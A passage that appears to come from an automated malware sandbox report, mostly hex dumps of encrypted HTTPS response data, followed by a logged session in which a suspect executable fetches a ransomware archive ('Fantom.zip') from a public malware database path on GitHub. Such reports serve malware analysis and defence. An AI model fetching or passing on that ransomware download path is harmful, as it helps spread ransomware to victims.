                                                                                                                                                            2022-09-29 12:44:48 UTC711INData Raw: 63 e3 68 e4 c6 9e e2 a3 8a e6 d7 62 10 67 57 ba e7 b9 c7 5a ab d4 1e 61 6b 7a e6 9e 78 da ba 6b 52 b8 00 21 07 0a c2 7d 23 1e da b9 80 18 e8 90 73 f1 40 9a b3 d6 8d cb fb 2b 97 be 02 7f b4 d3 39 95 af f4 72 63 1e f6 a2 da 49 87 cb 47 ce 05 7e c2 a2 bb 0f b0 5a d1 c7 0a a9 da 0e 24 29 3f 0a 03 eb cb 00 ef 15 6f 51 b5 c1 80 75 05 95 a1 e3 df e0 2d d6 cb 6a ab 53 f8 c4 8f 5b 90 16 7d c9 24 31 2f 8e 42 1f dc 33 f6 58 5f 96 e6 28 f9 68 63 11 67 1c 83 37 a5 ad 2e bb a0 e0 7c 62 ef 1d 2a 07 18 7a d4 d0 f0 41 97 89 fe 2e 6b 2f 72 9d 4d ce 6e 94 a6 61 a8 78 87 d8 1b e4 6c b5 ce 4b b5 4f ce 55 4f c4 7c 10 59 6b de 43 3d 1d 4d 6f 20 d5 10 92 32 d3 d0 b1 1e 16 fd 92 52 22 75 ac 25 04 23 30 66 49 aa 72 ab 57 e1 17 ac aa b6 02 5a 01 0d bf bc ee 23 7f e9 39 c4 b9 8c 4a
                                                                                                                                                            Data Ascii: chbgWZakzxkR!}#s@+9rcIG~Z$)?oQu-jS[}$1/B3X_(hcg7.|b*zA.k/rMnaxlKOUO|YkC=Mo 2R"u%#0fIrWZ#9J
                                                                                                                                                            2022-09-29 12:44:48 UTC712INData Raw: c0 16 26 bf 4d d1 e2 51 32 8a 2b 03 c7 b7 f9 d1 0e 3d 2e aa ef de a2 03 b0 5f d8 33 90 de e8 7d 7b fc 48 a0 da c8 f5 c6 86 d8 96 eb 2b 47 41 91 97 3f 56 0f 04 69 e4 bc a0 ad a2 df 3a 88 d6 91 74 0d 11 63 75 81 a5 a3 9f 28 0a 78 4b bf a8 30 80 42 bd cd 1f 1a 01 5b a2 14 9c 88 c1 a5 1e 59 09 b5 4b da 67 69 01 ca b1 f9 a0 91 aa 84 41 bd 2c b6 d1 46 be 13 2d 8d 9f 2c 4b ef 0c ae 79 6c d4 de d0 be 9f 45 8f e9 ef 5e 26 fb ad 99 0a 25 df b8 fc 04 3a 36 81 83 80 09 94 dd dd 8c 1d e1 d4 51 ce 78 3c 64 d6 04 0f ee dd 54 ac 34 ba c5 3c eb ee 1f 80 3a 91 8f ea 5a 85 94 67 c9 bf 4f fc 1f 6e 48 dc 90 bc 11 9f 39 86 d0 a1 f4 13 f9 f8 86 94 63 97 b2 0c f9 ef 6d b4 7e 94 fe fe 0d 2a 15 d9 58 f9 f2 c4 b8 6d af 6a 14 b8 9a 0b b7 09 73 1b 41 e8 53 d5 d7 5e 83 a4 07 00 5c e2
                                                                                                                                                            Data Ascii: &MQ2+=._3}{H+GA?Vi:tcu(xK0B[YKgiA,F-,KylE^&%:6Qx<dT4<:ZgOnH9cm~*XmjsAS^\
                                                                                                                                                            2022-09-29 12:44:48 UTC713INData Raw: 4d 75 31 64 cd 2b 67 52 d1 94 ed a5 1e 34 cb 3d 1d 89 90 b0 dd 42 2c 1b e6 9d 8b 1d 63 62 0e f2 67 1e d0 72 19 41 97 fb a7 32 20 81 12 5d 2d fa 6e cb 7a ce 85 ac 3c 78 01 ba 59 39 79 9b c6 6b b5 68 82 d7 4b 64 75 6e 8c fb 80 3a 9e 4a c8 df 93 cb 87 51 79 6f a1 b0 34 77 4a b3 a6 6e 3b 55 a3 7d 93 c7 64 35 e9 33 1c 52 35 db c6 e3 c5 15 c0 24 df 09 5c 7c 94 f4 8f ae d9 c8 a9 5f c6 8c 5c 83 e1 17 3e 85 67 c4 a6 cc f6 cd 8a ad db 36 87 25 5f ed 93 48 ab 2d 8c 2a ee e5 21 c4 f0 d8 89 33 41 9a 16 14 69 b3 2d e5 06 c4 65 37 f7 ef 13 b7 a2 bd 1c 59 97 cb a2 c1 68 7b 4f d3 2d b0 d5 13 06 53 5a 4d a8 55 ad d3 90 80 6f 0d 3e 5f 60 fd f5 b1 61 09 0d 57 ee f7 53 d6 9c 37 22 54 29 95 cb 7e dd 06 85 b0 a5 a6 8a 63 d3 91 3b 0e 87 53 7c 5d 33 ba 80 3a ed 7f fb b4 dd 5e 27
                                                                                                                                                            Data Ascii: Mu1d+gR4=B,cbgrA2 ]-nz<xY9ykhKdun:JQyo4wJn;U}d53R5$\|_\>g6%_H-*!3Ai-e7Yh{O-SZMUo>_`aWS7"T)~c;S|]3:^'
                                                                                                                                                            2022-09-29 12:44:48 UTC715INData Raw: 12 e0 6c 86 d1 e9 5a 55 44 35 21 e0 80 b1 1d da 3e f3 c1 e9 a1 0e 23 54 85 3c 8b 40 73 1f 4e 6e 31 07 39 c7 76 fb 98 c0 66 2b 8e f3 6f 3d 5b 84 4c a0 0d c8 94 ea d4 08 68 66 34 01 8f fc 37 4f 91 24 a2 32 4d b0 42 1f 91 d9 60 ed 91 9d ef 2e 97 a6 64 07 b2 66 e8 68 64 a1 27 b1 5f cd 33 6c cf 77 e6 bb 13 03 b3 ea 39 4e d7 4b 15 38 cb b6 71 64 45 43 c9 c4 b1 13 cd bf d9 e4 a5 6d 8b 19 d6 a2 77 ff 04 64 f0 b9 e7 9c 5b 3a 9b 85 05 c0 0a 93 20 e2 99 1e 84 a8 e0 b3 57 8b 06 01 1e 6b 9f b0 84 f1 cf c5 d1 2a 19 a4 91 e7 45 36 b4 1c 7f c0 99 0d 69 e0 e0 c1 96 1e e1 69 7a 53 b4 af b9 5b 6b 8a c3 ee e0 91 9b 0b 20 d4 99 50 13 19 06 0a d8 02 73 f6 e2 4d 79 51 26 ec ff 26 ed 51 23 46 c0 e3 74 ad ce 1c ae be f3 ca 16 ef e2 d4 55 c6 bc 92 ad 27 56 a1 9d 91 f0 b2 4c 09 0b
                                                                                                                                                            Data Ascii: lZUD5!>#T<@sNn19vf+o=[Lhf47O$2MB`.dfhd'_3lw9NK8qdECmwd[: Wk*E6iizS[k PsMyQ&&Q#FtU'VL
                                                                                                                                                            2022-09-29 12:44:48 UTC716INData Raw: 46 d1 b9 9e 1a d4 b4 27 0d 2c b8 89 e0 00 8e 49 51 66 fb 18 bb b8 a8 d9 9f bd f6 ce a7 24 cc a1 ae 02 a0 98 b0 36 18 85 f6 bd 70 2f 7c 15 b8 7f 45 c0 89 eb dc 8a 2c 75 81 c5 9f 71 52 34 73 03 9c 32 ed 98 68 a6 bb a5 42 90 67 f2 2e 34 74 6a 29 82 60 b7 61 f6 5f 5b 7c 4d 19 75 33 ec 52 f8 eb 3a f4 ef 3a 56 2f 93 1d e3 b6 00 80 2d 79 15 c7 a6 95 e4 25 3c f8 f2 08 e8 46 9d 5e 01 1a 0f a8 a2 fc 5f b2 8a 7a 7a 35 3c 8c cc fe 72 c5 51 61 f5 cb 7a c7 79 39 49 3d c4 3f 34 73 a9 d0 12 78 c1 23 65 9b 86 ca 78 aa 54 b4 23 dd c0 7e 8e 07 21 d7 b3 7d d3 aa 46 7c 95 54 a5 51 ae 3d 30 04 3b 18 27 21 70 85 14 04 ac a3 90 8c 85 d7 81 aa 2c e5 24 a4 18 7f f0 45 33 27 df e3 9b 94 e8 05 f2 51 9f 21 c8 ee b8 40 73 68 15 72 6f f8 42 1b 38 a5 ca 66 ab 32 1d 91 b7 2d 4a f1 01 bc
                                                                                                                                                            Data Ascii: F',IQf$6p/|E,uqR4s2hBg.4tj)`a_[|Mu3R::V/-y%<F^_zz5<rQazy9I=?4sx#exT#~!}F|TQ=0;'!p,$E3'Q!@shroB8f2-J
                                                                                                                                                            2022-09-29 12:44:48 UTC717INData Raw: f5 17 48 83 11 6c 16 33 8c 94 48 d1 b4 fe 32 cc a4 83 bc 13 76 af 2d 2c 8f f9 3d bb 08 71 85 5e 1a 07 23 ef dd e1 3d 9e 6d 91 36 9f b9 b7 f2 48 49 70 1e 07 4b 4b b1 00 a1 48 71 45 a8 96 0b 8c 24 8a e2 40 c5 df 95 16 ca 89 da 22 d2 43 74 38 31 5e b1 4e 84 03 42 87 03 bc 4e 92 37 93 ab 84 a2 43 e3 f1 e1 6a ed 31 be 64 cc e4 03 33 1b b1 36 a0 d9 d1 70 d2 c7 3f 81 0d 14 3b 45 48 62 64 e6 cb 7b 47 3c 44 d0 63 27 b4 9f ac 3c 18 04 3c ce 7a 8c 8b e9 16 b0 e6 3d 27 1c 2a cb 83 d1 96 d5 1b 6e 1b b4 4c a7 7d 3a 40 8e ae bd 6c f2 c1 62 ba 7a af 33 3e ef 05 4c 45 58 3a 1e ec fb 49 ec 38 fb 04 5c 07 ff 8e eb fb 6b 42 72 24 e1 c3 c1 93 14 fe 47 ef 83 2b be 72 51 ec 1e f7 8e af 9a e9 3d a5 e5 21 df 81 34 1d 7f a4 6a 6c 3e 2e 18 e3 1e e8 46 5f 90 1d ef 19 46 5f 03 11 ae
                                                                                                                                                            Data Ascii: Hl3H2v-,=q^#=m6HIpKKHqE$@"Ct81^NBN7Cj1d36p?;EHbd{G<Dc'<<z='*nL}:@lbz3>LEX:I8\kBr$G+rQ=!4jl>.F_F_
                                                                                                                                                            2022-09-29 12:44:48 UTC718INData Raw: 98 40 fb 1a d8 c9 a3 15 40 64 53 58 11 81 e2 ca ad 34 4a 9d 0c a3 b6 8d 48 24 2b b8 db e3 2a 64 8a 83 ad f2 b8 a7 1c f6 70 18 a4 77 d4 90 d2 76 02 de 87 de 17 86 09 a7 24 9f 4e 7e 54 bd 69 72 a5 8a cb 22 c3 80 db 84 2d 94 8f e5 13 0d 4e 1e 2d 47 5b 78 c2 e6 82 ab 10 97 cd 1d ea 91 be 43 80 e3 1b 49 04 32 b3 fd 80 a9 4f 9f 2b 21 bb 25 15 1f 35 70 58 8b 4c 07 f7 4e ae b3 4c 9d 48 bb 91 2d 7d 35 33 d1 57 69 1f fd a6 cc db 0c bc b1 f9 b5 76 0d 04 f0 5e fc ad e2 04 c3 d5 ab 5a 10 3a cb 6c 95 46 b7 ce af e3 10 71 8d f8 48 c0 81 13 8a 4a 69 64 d0 57 bd ca 40 b4 38 3c 16 8d e8 c4 4b ea 6d a3 76 a5 fe 46 83 a5 f1 ae 32 f2 9c 7c 3a 9f c9 0e c8 42 c6 da 81 ec 06 b0 85 19 fb 5a 29 2b d0 93 9b 70 f0 2f 75 61 be ed 07 6a 19 0b 7f 55 fe f8 40 5d 8c 15 0a b2 19 90 3f 7c
                                                                                                                                                            Data Ascii: @@dSX4JH$+*dpwv$N~Tir"-N-G[xCI2O+!%5pXLNLH-}53Wiv^Z:lFqHJidW@8<KmvF2|:BZ)+p/uajU@]?|
                                                                                                                                                            2022-09-29 12:44:48 UTC734INData Raw: 51 3b 17 d1 c6 ce 40 47 99 39 da a3 d1 7b 8e 27 69 88 c2 de 38 91 14 44 b8 e8 72 b8 29 9b c7 8a 58 e9 3c 79 09 9d db d8 de 72 e2 05 29 6c ad 3e c6 70 06 af 35 e2 b8 cb aa 1a 8a 23 c1 c5 ac 64 0b 89 68 49 db 1b 40 97 7b ba c5 da 82 b0 96 ba 3d 3f cc 3c 92 8e 20 39 fc e2 c8 70 12 6a 89 c6 fd 70 bb e7 cf 47 44 00 d2 80 a3 b1 7a 26 38 ff af 8b 0f 50 4b f4 dc 14 ea 73 d7 64 5c 9a df 1c f6 ff cd 2f 13 17 f8 61 eb c1 3e 6d fc 19 81 3d 86 11 ff d0 d8 f4 f8 07 1b 93 fb 34 5c 85 ed 78 39 e8 23 43 31 34 b8 8e c7 b0 34 3d 39 1c 36 71 d1 23 51 2b 3f 51 d1 93 77 ea 23 cb c1 19 1d 3e 34 fb 48 b4 d9 12 9e 85 5f b9 7f b5 63 0b 25 7d a4 f7 f7 7e 8d e8 ee 7f 97 91 58 5e cb 29 bf 55 b7 57 24 69 f7 33 2c 62 5b fe 99 de 85 17 ad 69 ce ef cf 8f 3a 8c c7 f6 9e 1f 8d 0a 16 37 ec
                                                                                                                                                            Data Ascii: Q;@G9{'i8Dr)X<yr)l>p5#dhI@{=?< 9pjpGDz&8PKsd\/a>m=4\x9#C144=96q#Q+?Qw#>4H_c%}~X^)UW$i3,b[i:7
                                                                                                                                                            2022-09-29 12:44:48 UTC750INData Raw: 21 8e 91 a8 67 92 be 7d 08 74 8a b7 12 b0 a9 a1 39 bb 1b fc 89 65 cb 79 62 ef 1b 71 2e ab 4c 22 f7 db 2a ba 3c 42 cc 87 bf 37 cc 92 31 21 bb 0e dd 89 4f 19 bc 54 02 a9 19 22 56 e8 dd c2 3c 39 8c e7 22 0f 92 cf 3b 9c 32 97 fd 14 c8 7d 5b b2 e3 a1 43 c8 06 b0 ee 8a 03 55 a6 21 f2 d3 0c 4f 5a 5c ed 1b bb b3 1b b2 ef ca fb ad 3b 82 25 aa ee 2c 15 94 3d 4a 24 b8 21 76 90 b7 9a ae d6 aa cf b5 7c 3a 2e 92 38 9c cb 1d 27 71 5f eb 38 16 15 08 9c 9b 86 b1 ca 9b 11 b1 05 79 69 0c be d2 f0 6f 93 ed 1c 4d 69 7b d0 87 2c 37 84 0c 0e c6 af 31 62 4c b5 ab 7b db 24 50 43 03 19 a7 b7 f8 12 1a 7c 16 b0 09 95 34 0b fd 6c d2 87 b3 36 cd c8 11 2d 8a a6 f2 c7 65 34 df 8b 08 fe 71 82 42 f7 00 67 ae a1 40 95 22 f8 e9 84 c8 23 79 0f e5 1c d2 aa c9 69 a5 6b 66 3f 9f 14 c3 af 2f 56
                                                                                                                                                            Data Ascii: !g}t9eybq.L"*<B71!OT"V<9";2}[CU!OZ\;%,=J$!v|:.8'q_8yioMi{,71bL{$PC|4l6-e4qBg@"#yikf?/V
                                                                                                                                                            2022-09-29 12:44:48 UTC766INData Raw: e8 78 09 62 5e 9e 38 7d f5 a0 90 8b 43 3a c4 59 e1 b5 12 60 52 db c8 26 a6 e9 39 88 85 dc 2d 71 85 48 d6 eb e6 23 fe 3a 47 b1 d6 ad 87 91 a4 e0 6e 00 62 4a ca 74 a6 85 07 5f 3d 1f 0f c3 a9 84 2a ea d1 33 95 af ed f4 c8 7c 32 b5 e0 65 43 3c d8 a8 0e 99 5b f5 bd c7 8f 1a ab 06 02 c4 5d a0 f9 9b 99 f3 fd 34 f2 e8 66 3d d8 08 f7 f4 14 de a7 e8 7c 9f e3 d5 3c 22 a1 8a 86 c9 5b ba 71 b2 b7 f9 db 3f 31 2a 6f fe 19 51 a9 45 09 7f 60 59 34 ed 2c 6d 2e a9 47 ac 3f fa 4d 04 f5 d3 2e 4b 56 82 42 7e 52 a3 69 aa 71 a9 9b 8a 32 71 dd 16 79 6a 56 b2 f3 f7 9a b7 22 c4 b1 4c 2a 27 3e 8e 2e b4 d2 34 41 0e b6 a6 10 c5 98 e0 e9 82 9b 98 7b 18 4a a6 0d 47 d9 12 42 b3 ce b5 56 50 40 8b 25 00 f8 20 9f b0 72 32 99 23 0e c0 25 5e db d7 53 8f dd 1f 33 a0 46 7b 3c 93 a5 30 51 da 28
                                                                                                                                                            Data Ascii: xb^8}C:Y`R&9-qH#:GnbJt_=*3|2eC<[]4f=|<"[q?1*oQE`Y4,m.G?M.KVB~Riq2qyjV"L*'>.4A{JGBVP@% r2#%^S3F{<0Q(
                                                                                                                                                            2022-09-29 12:44:48 UTC782INData Raw: 30 10 05 7e 64 0a f8 f5 c1 67 5b 9e ae 27 91 1f d5 ae b9 ef e1 5d a0 da c9 0e fe c7 95 fe 32 7e 96 c0 df 02 7f 2e 1c 21 19 e6 6e 7d 66 a2 6f e5 c6 31 cb c4 85 e6 b0 e5 0e a5 ba a6 2f a1 43 7e 0b 54 d2 61 55 80 0c ea d8 86 b6 a1 49 63 df be a3 d7 7a 98 f8 29 aa 2d f2 76 7c 0b 1b bb f4 e4 e6 f1 83 ec 0b 6f f4 7a 6a 04 1e a6 30 f4 69 c7 2c a5 3a 80 eb d4 1c 6a 0d eb bb 8c 58 bf 33 84 82 90 50 37 a6 37 d0 e2 bf 1f b4 a0 3d a2 35 fe 18 50 ad 05 36 8b f4 fb 34 cb 80 a4 02 ce 76 09 fe c9 40 ad 8e 5b 2d 35 9a 83 43 fe 0d 87 ff 26 00 d4 7f 57 b3 c2 6e 30 ef 51 11 d7 f4 4b 51 09 71 22 ff d5 eb 61 27 31 4b ca c3 ff 7d 20 5a e6 af ad 7b fc a8 97 59 be ed bd 06 8d cb 47 f0 13 ba 4a 1c b5 12 72 c7 d7 16 00 de 4d 58 eb ea 90 8d 73 b7 8b ad d7 31 d1 bb 95 27 33 d4 b2 95
                                                                                                                                                            Data Ascii: 0~dg[']2~.!n}fo1/C~TaUIcz)-v|ozj0i,:jX3P77=5P64v@[-5C&Wn0QKQq"a'1K} Z{YGJrMXs1'3
                                                                                                                                                            2022-09-29 12:44:48 UTC798INData Raw: 92 64 f9 eb 4a cf 3a 34 a4 57 e3 80 a5 3b 12 a5 66 8b ce b1 85 9d d3 6f 83 bd e8 59 54 6a bb 52 62 d6 d1 0c c5 9d 29 c1 50 f4 a4 4c 07 5e c7 1f ee 44 c6 ba f6 1f df 08 9e d3 dd fd e7 75 12 a8 66 49 08 39 cd f6 5f e6 57 a1 97 1b 01 bd c2 06 ff 2f 1e f3 ec f7 1a 91 c7 14 bd 37 56 62 ee 8f 97 cd 23 56 dd 0e 02 8b 45 02 09 8f f9 72 0d e7 80 8b 61 a0 53 b3 a1 67 22 a8 b1 e2 03 d4 a2 96 24 e8 db 52 0b 62 28 c7 55 23 0f ed 96 02 8e 52 d6 77 51 8c 4a e7 b0 a0 0a d6 51 ac 72 07 c1 d6 18 8e 88 5e 8b ad 1f b5 4e cb 07 1b ad 7e 61 20 42 4e 08 28 44 2f 52 80 1f 69 5a 39 c6 6f bb 8e 27 86 94 7d 3e cf d5 0e 5c 0d a5 c5 60 dc aa 1d 72 50 73 12 96 ef df 2e 96 98 18 27 d3 1c 17 94 cf 11 b3 9d cf 03 29 4b 70 65 7c 64 0b 2b 56 96 40 93 e7 98 6b 5d 58 f3 0c e1 9e fc d2 9c 1d
                                                                                                                                                            Data Ascii: dJ:4W;foYTjRb)PL^DufI9_W/7Vb#VEraSg"$Rb(U#RwQJQr^N~a BN(D/RiZ9o'}>\`rPs.')Kpe|d+V@k]X
                                                                                                                                                            2022-09-29 12:44:48 UTC814INData Raw: 67 0b 19 d2 f6 5f 01 a2 23 bd 79 71 d9 51 c5 66 a3 db 61 58 c5 b5 84 91 db e6 4c 5f 1f a6 01 62 b5 4d 19 cb ac a4 96 05 56 eb 21 19 ca 05 7c 36 a0 2c 19 f9 c6 34 79 a7 b9 3c bf e3 98 1c 55 23 6a 3b b2 c9 dc 49 2a bb 2b 45 e7 55 1c 92 35 1e 80 b0 ee 62 fc 69 b7 35 d9 62 0e fb 2f e2 a2 f7 bf 68 ec 11 ef be 22 55 ba f5 aa ef 8c 51 ea 69 31 a7 e2 5d 52 7e 4c 5f a1 97 01 ae 20 2a 17 a8 21 db 16 30 ef c6 ab c4 d3 b2 1a 79 78 79 9e aa c4 e4 00 92 fa 28 68 de e8 80 f7 92 0f c2 c3 8f 76 3e 51 2e 0b 9c 6a cb c6 d4 6a 2a c2 ff 57 d3 ab ea 35 ef 57 df 8e df b8 12 55 b6 d9 46 ec 08 2a cb 14 c9 5b 14 f2 af 4e a8 67 20 66 49 17 4b 2e 86 ce 1e 93 de 14 8e 83 4d ab f1 38 69 30 8d 31 65 58 41 bc 90 f1 20 4f ed d0 93 7f a1 ee e0 13 d9 a8 d6 87 e5 30 3b b8 84 b1 7c e8 c5 23
                                                                                                                                                            Data Ascii: g_#yqQfaXL_bMV!|6,4y<U#j;I*+EU5bi5b/h"UQi1]R~L_ *!0yxy(hv>Q.jj*W5WUF*[Ng fIK.M8i01eXA O0;|#
                                                                                                                                                            2022-09-29 12:44:48 UTC830INData Raw: 20 07 65 82 ef b6 c3 26 8a 95 c8 ce 62 ca 7b c0 24 f5 91 07 80 47 91 95 0a 63 7d 18 ca 6f 2a ea bb 08 ba 6c 25 4d 50 0d 36 e3 fe bb 25 5f 53 62 ef 69 d9 76 00 66 a9 60 ca ed 4f 9c cb 74 e8 d4 3a 4a 2d 29 3e 59 ef 00 0c 9d 7b 9e eb 1f db 61 ef e7 f6 79 2b 17 7b f8 d1 9a 78 57 52 55 cf e6 80 41 70 c2 67 18 5c 16 f2 81 20 79 b5 65 df 54 2a 01 cb 3e 65 c1 81 a7 58 a2 78 0d 31 23 96 06 0a 77 2e 32 f7 28 9e 00 a0 21 1b 27 55 63 51 dd 6d 53 c2 ae 3c f6 72 45 75 f7 17 94 70 15 85 eb a3 47 3f e0 dc 4a c9 ad b4 51 d5 5a 64 08 26 00 6a 46 bd 91 7f 26 68 53 e9 21 ba 45 63 57 4f 06 4f 8b f7 31 4c ab cf 38 dc 49 1a 79 dd a4 ff a2 27 5c ec af f5 76 ea 32 bd 83 94 f9 c7 38 b5 52 06 bc 13 36 46 64 91 40 05 7d 1e e5 31 ab e8 34 57 17 1d 6e e6 0f f5 70 b2 f9 30 3d 1e 4e 5a
                                                                                                                                                            Data Ascii: e&b{$Gc}o*l%MP6%_Sbivf`Ot:J-)>Y{ay+{xWRUApg\ yeT*>eXx1#w.2(!'UcQmS<rEupG?JQZd&jF&hS!EcWOO1L8Iy'\v28R6Fd@}14Wnp0=NZ
                                                                                                                                                            2022-09-29 12:44:48 UTC846INData Raw: d0 e4 53 5f 9c b4 59 61 54 26 36 c1 e0 f4 af 77 d8 1b e0 16 62 41 ea 11 20 7b 0b 1e 29 22 0e 39 31 d7 f9 ac e8 3b aa 3f 02 c1 0d d9 82 8b 34 bd a7 cd 71 19 1b a5 0a 72 f1 23 83 3a a2 a0 73 17 cb ef c9 ea 86 9b 87 72 26 f6 c1 13 00 52 a1 7a 5e 92 93 ac 86 bc a4 a1 ca e3 88 a8 a7 2e bd 62 40 89 83 02 79 11 73 2b d0 03 a9 8f 94 78 d0 fb 39 4c 1b 73 ee e4 37 1b da f6 bc c5 5f 8f 0a 11 ca 98 31 2d eb 9f 06 d0 72 ed 42 b1 e2 23 09 ee 51 19 74 8b a5 7e 7d 20 d2 f5 4a ed ab d7 b2 af 6e c0 5c da c2 7e d5 91 53 97 ce 4e e9 1a 88 d7 90 b4 6f 8c fb 89 2d 93 6a 56 28 b8 0d f5 86 c3 6b f4 d8 b7 22 cf 64 0c 76 6a ec 66 b6 21 c5 1f db 57 2f 1b cc 76 38 92 bb 04 fc 51 22 aa 4e 9f 5c bf 2a 38 85 cb cd 03 c9 01 85 c5 70 93 95 0d d3 73 70 5b 6d 9d 97 82 31 a1 da 02 54 cd 5d
                                                                                                                                                            Data Ascii: S_YaT&6wbA {)"91;?4qr#:sr&Rz^.b@ys+x9Ls7_1-rB#Qt~} Jn\~SNo-jV(k"dvjf!W/v8Q"N\*8psp[m1T]
                                                                                                                                                            2022-09-29 12:44:48 UTC862INData Raw: 23 ce 39 6c 23 6e 2e 6a 28 94 cb e6 16 51 1a 99 5f 79 ac 45 b9 e3 c5 21 0f 45 55 8e fd 4b 68 5d e8 5c 22 32 99 7f c9 87 57 a7 3c f0 df 6c aa 77 a3 04 f4 a4 77 e5 a8 c6 be 46 bd c3 15 5a ee 08 e8 b9 df ec f5 d8 b3 44 fb 98 d3 3a ae a8 ec b9 64 8c c5 30 2f 3d a8 9d ff 7c 00 be ab 9b 32 b5 13 d8 03 5f 0f 90 33 b5 75 23 7e d8 db 15 85 c8 a1 42 68 74 75 d1 8f d0 63 97 1b 75 ff 4c a0 54 3d 53 57 18 c9 95 b4 55 32 13 88 50 83 34 47 6f bb 2e 48 b2 13 52 35 32 19 09 d7 73 65 77 9b 71 92 53 a5 c8 d8 a0 3f 85 ba 1a 29 88 d7 6f 48 45 fb 61 e0 e4 b0 08 18 d2 97 c1 a0 4c 2d 84 03 da e8 9a ce 0b 12 6d d1 91 a9 33 8b 2a 0e 62 cc d3 ac 9d 87 48 cf f5 3a 6b 83 10 a7 e3 bb 93 89 5b d1 62 20 b1 2c 53 ba d8 a5 9d f2 64 06 aa db ed bc ff d4 2e 7c 59 b0 9b e5 c9 40 aa f7 7d 74
                                                                                                                                                            Data Ascii: #9l#n.j(Q_yE!EUKh]\"2W<lwwFZD:d0/=|2_3u#~BhtucuLT=SWU2P4Go.HR52sewqS?)oHEaL-m3*bH:k[b ,Sd.|Y@}t
                                                                                                                                                            2022-09-29 12:44:48 UTC878INData Raw: 25 07 ee 34 33 31 fa 6c 7d a0 6b bc 6a d6 11 8c 9e 82 19 95 d0 06 df 22 a8 5c 08 49 d2 8b d5 19 c2 8c 0d a2 5a 7a c0 78 1a ee de 7a 27 d3 ad 07 fd c4 dc 32 7d 0f d1 04 90 79 c1 c0 19 3b df b5 06 69 e9 33 0b 62 be d1 70 96 31 aa 2b 16 e6 90 44 e6 d2 32 77 fa b0 79 60 e1 9f 61 fd d4 23 39 85 a0 d3 57 b0 80 db e9 ee 18 6a e8 09 41 22 fa f0 8a 42 94 b2 13 5b c0 98 22 4a 77 15 e1 56 05 d4 6b 2e 90 76 06 a6 b4 83 65 be b4 23 48 36 70 fe 96 f9 7e a1 71 f2 c2 76 79 8d 51 f1 35 fe 7e b7 ea 48 40 ef ef 22 a0 6a 24 76 6f 97 c1 a1 aa ae 38 20 ac fa f8 76 17 5a 7f 80 0c ec bb f8 20 be 12 49 cf a1 68 e3 2c 90 1f 2e 43 98 c2 84 9a c3 33 0b ba 9e 8d d3 10 a0 31 92 b9 2e 48 57 f2 3a 41 bd e0 a3 62 ee 68 b6 c1 c0 36 6c 4f e6 cd d9 5d 82 c4 95 f2 f2 8e 01 3f a5 65 aa 89 bc
                                                                                                                                                            Data Ascii: %431l}kj"\IZzxz'2}y;i3bp1+D2wy`a#9WjA"B["JwVk.ve#H6p~qvyQ5~H@"j$vo8 vZ Ih,.C31.HW:Abh6lO]?e
                                                                                                                                                            2022-09-29 12:44:48 UTC894INData Raw: 3b 83 43 7c c0 eb 31 ba a4 a1 ae df ae 75 3a c4 ff 70 58 8e 50 a1 8c 96 ab 83 09 d0 83 4c d9 b6 71 b5 dc 90 c1 5b a6 d0 08 ad 02 5a 87 36 56 6e 84 a1 8d 16 1c 94 9b c3 db 0c 1a f4 71 20 e8 27 17 63 10 ff ee eb e3 f2 65 2d d9 be d0 4b 7b 7d 29 da ef e1 42 37 3c a5 78 ac 52 1b f0 6a 91 6b 64 78 fc 70 a4 4f e8 05 0e 03 9d 16 5a c6 55 67 ea 85 fb 57 1b ae 66 bf 27 47 01 80 d8 bc 35 49 d3 47 0b a4 06 d2 af 85 87 97 cc ed a1 9b 5d 29 b5 6b ee 5d de ab 5c b0 8d 50 db 0c ff 6d 77 0f 60 ca da fc 62 53 69 d1 6e 24 67 51 2a ad 5b f8 b2 84 cc 9f be 50 6e b1 63 c7 f7 48 37 cf 18 f1 53 a8 49 b8 ee 57 35 c8 15 65 4b c2 04 0c 87 f2 ba 90 04 4d 72 89 bd 6b 1e 4e 1a 93 a9 66 4a c7 1b 64 1c 7c 5a 34 83 a8 a4 16 3b f2 98 b6 8c 6c 34 9e b3 e5 4a 8d c0 30 66 76 06 a1 de c6 8a
                                                                                                                                                            Data Ascii: ;C|1u:pXPLq[Z6Vnq 'ce-K{})B7<xRjkdxpOZUgWf'G5IG])k]\Pmw`bSin$gQ*[PncH7SIW5eKMrkNfJd|Z4;l4J0fv
                                                                                                                                                            2022-09-29 12:44:48 UTC910INData Raw: 88 29 ac 3a d9 19 67 d4 0b 1e a8 7d 6e 14 f8 37 b8 7b 2e 60 c1 d3 72 89 e8 b3 d6 5d f8 6c b1 4e e9 fe 7e 11 72 ba d7 5b 54 06 96 4a 64 5a 8c 4a ff 2f 49 7d 5f b1 47 3a ea a8 e5 f0 b9 c9 bb b0 70 c2 49 ca 32 4b 10 1d ca c4 40 cd 13 67 3d 21 fe 93 ee c4 75 d5 20 94 e3 f2 6a 46 ab 6a 21 70 32 7e bb 67 68 8c bd 59 b5 bc ab d0 e6 9c 37 46 33 96 2f 0e ef a2 67 ee 4a 4d 6b 42 75 cc 1d f8 01 2d 25 c1 7e 37 a5 fa bc e0 80 0c 08 6a a9 13 2a 33 1c f0 4d 34 00 36 be 77 af 93 db 9f 92 4e d5 96 10 47 47 8a 98 cd ce 35 15 f6 41 1c f3 2d 42 fc 84 b1 ba f7 8f 43 8c fa eb 0d 63 0a d0 55 56 73 2a 43 31 fc d1 38 33 9e 58 43 7b 23 1d 01 48 ce c6 85 65 56 07 cd 3c 27 8f 2a 31 3d 1b 9f 4b 2b 42 4d a0 40 8a 73 c7 21 d6 7c a1 ad 87 51 c4 41 f0 be 7b 87 36 42 8d 7c 9c 96 23 de dd
                                                                                                                                                            Data Ascii: ):g}n7{.`r]lN~r[TJdZJ/I}_G:pI2K@g=!u jFj!p2~ghY7F3/gJMkBu-%~7j*3M46wNGG5A-BCcUVs*C183XC{#HeV<'*1=K+BM@s!|QA{6B|#


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            18192.168.2.649717140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:48 UTC913OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Fantom.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            19140.82.121.4443192.168.2.649717C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:48 UTC913INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
